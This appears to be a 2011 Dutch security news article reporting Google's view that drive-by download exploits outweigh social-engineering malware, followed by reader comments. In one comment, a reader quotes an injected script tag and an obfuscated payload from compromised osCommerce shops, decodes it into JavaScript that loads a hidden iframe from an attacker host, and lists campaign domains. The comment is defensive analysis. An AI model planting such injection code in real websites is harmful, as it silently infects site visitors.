image

Google: Drive-by download gevaarlijkste online dreiging

donderdag 18 augustus 2011, 09:28 door Redactie, 5 reacties

Niet het verleiden van internetgebruikers om zelf malware te installeren, maar ongepatchte software waardoor websites automatisch computers kunnen infecteren, is de grootste bedreiging op internet, aldus Google dat daarmee lijnrecht tegenover Microsoft staat. De zoekgigant waarschuwt internetgebruikers via de Safe Browsing API, een blacklist die zowel Chrome als Firefox gebruiken.

Elke dag geeft deze API drie miljoen malware waarschuwingen aan vierhonderd miljoen gebruikers. Google heeft nu de ontwikkelingen van de afgelopen vier jaar in kaart gebracht, waarbij het vooral keek naar de technieken die malware-verspreiders toepassen om detectie te voorkomen. Daarbij concludeert de zoekgigant dat social engineering, waarbij malware zich als anti-virus product of browser plugin voordoet, helemaal niet zo gevaarlijk is als Microsoft en veel anti-virusbedrijven ons doen geloven.

Het aantal aanvallen dat social engineering toepast groeit, maar deze groei moet wel in het juiste perspectief gezien worden, zegt Niels Provos van het Google Security Team. Websites die op social engineering vertrouwen zouden voor slechts 2% van alle websites verantwoordelijk zijn die malware verspreiden.

Exploit
Veel vaker komen volgens Google drive-by download-aanvallen voor. Hierbij misbruikt een kwaadaardige of gehackte website een beveiligingslek in de browser of populaire plugin zoals Adobe Reader, Flash Player of Java. "Onze analyse van welke lekken actief worden misbruikt, laat zien dat criminelen snel naar nieuwe en betrouwbare exploits overstappen om detectie te voorkomen", aldus Provos.

De meeste lekken worden slechts een korte tijd gebruikt, totdat er een nieuw lek beschikbaar is. Een uitzondering hierop is het uit 2006 stammende MDAC-lek in Internet Explorer, dat in de meeste exploit-toolkits aanwezig is.

Onlangs kwam onderzoeksbureau NSS Labs nog met verschillende rapporten dat Internet Explorer de meeste social engineering-aanvallen tegenhoudt. Volgens zowel NSS als Microsoft vormt deze categorie de grootste bedreiging op het web. Eerdere rondvraag van Security.nl onder verschillende anti-virusbedrijven wees uit dat ook hier de opvatting heerst dat social engineering het gevaarlijkst is.

Reacties (5)
18-08-2011, 10:05 door Anoniem
Als ik op Google zoek naar het oplossen van een mailserver probleem
Kom ik uit bij een wazige chinese site, met 100 popups
De bovenste hit!
Stuur je een mailtje naar Google, hoor je noooit meer wat van

Google is rommel, gebruik het niet
Ze willen alleen je geld hebben
Gebruik www.bing.com
18-08-2011, 10:17 door Bitwiper
Ik denk dat Niels Provos (van Google) gelijk heeft. Social Engineering kom ik zelden tegen, wel browser en plugin exploits.

Bijv. in webpages van gecompromitteerde osCommerce websites (nog steeds zeer veel) zie ik nu veel:
</title><script src=http://lamacom.net/images/j/></script>
Gisteravond naar gekeken, dan wordt de volgende obfuscated javascript gedownload:
Object.prototype.tes=-2;var s;aa=document.createTextNode("ha"+"rC"+"ode");s=String["fr"+"omC"+aa['nod'+'eVa'+'lue']];for(i in{})if(i=='t'+'e'+'s')h={};eval(s(7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,
44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,
[knip]
7-h,7-h,123-h));
[/code]Ik snap er eerlijk gezegd geen barst van hoe dit werkt (ik ben geen JS expert) maar als ik de "n-h" evalueer met h=-2 (zal wel uit "Object.prototype.tes=-2" komen), en ik voer de waardes aan de functie fromCharCode() (dat kan online op http://jdstiles.com/java/cct.html), dan wordt 7-h (==9) een tab, 103-h een "i" en 100-h een "f".
Als ik dat netjes formatteer (tabs weg, spaties erbij) dan zie ik:

if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("<iframe src='http://mariko10.in/iframe.php?id=8xb7qdqtkp2s5d6ut86vd54e36upp2a'
width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://mariko10.in/iframe.php?id=8xb7qdqtkp2s5d6ut86vd54e36upp2a');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
mariko10.in (91.228.230.54) is in Rusland.
18-08-2011, 10:22 door Bitwiper
(In 2 posts opgesplitst wegens de lengte)

Zoeken op "mariko10.in" levert http://ilion.blog47.fc2.com/blog-entry-304.html op (Chinees vermoed ik, mogelijk kwaadaardig) met daarin onder meer:
mariko10.in 2011-08-16 ?
karamelka.ce.ms 2011-08-13
atrostiks5.ru 2011-08-12
solnechnozdes.ru 2011-08-10
marko3.in 2011-08-09 ?
jhgukn.com 2011-07-30
qoogledns.com 2011-07-27
liveinerinet.com 2011-07-27
yaho0dns.com 2011-07-27
yandexpics.com 2011-07-27
arhyv.ru 2011-07-20
rsdisp.ru 2011-07-16
yandekapi.com 2011-07-16
sfkdhjnsfjg.ru 2011-07-04 ?
googleadcence.com 2011-04-20
rsstatic.ru 2010-07-13
aacf.ru 2010-03-03
lamacom.net 2009-07-03
chrisalrussia.ru 2008-11-13
willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites (Armorize)
Vanuit de besmette osCommerce site wordt dus vaak eerst een script gedownload vanaf één specifieke gekraakte osCommerce site, en met dat script (met soms nog een tussenstap) wordt uiteindelijk malware vanaf Russische sites gedownload. Die "primaire" sites worden vaak na enkele dagen uit de lucht gehaald, maar dat lukt kennelijk niet met de sites van de aanvallers.

Naast de oorspronkelijke "primaire" sites willysy.com en exero.eu ben ik ook tegengekomen: 1see.ir, adorabletots.co.uk, tiasissi.com.br en dus nu lamacom.net; als je 1 of meer van voornoemde hostnames in bestanden op een osCommerce site tegenkomt zou ik daar geen gegevens aan toevertrouwen.

Ten slotte heeft Jürgen Schmidt (security specialist van het Duitstalige blad c't) een (Duitstalig) stukje geschreven over hoe osCommerce beheerders hun site kunnen fixen, zie http://www.heise.de/security/artikel/Schnellhilfe-fuer-osCommerce-Admins-1323536.html.
18-08-2011, 12:50 door Anoniem
Ach, dat is het mooie aan adviezen/meningen... Er zijn er zoveel.
18-08-2011, 14:03 door Anoniem
"Google is rommel, gebruik het niet. Gebruik www.bing.com"

Dank voor je nutteloze advies.

"Ze willen alleen je geld hebben."

Wanneer heb jij voor het laatst geld betaald aan Google of aan andere search engines ?
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.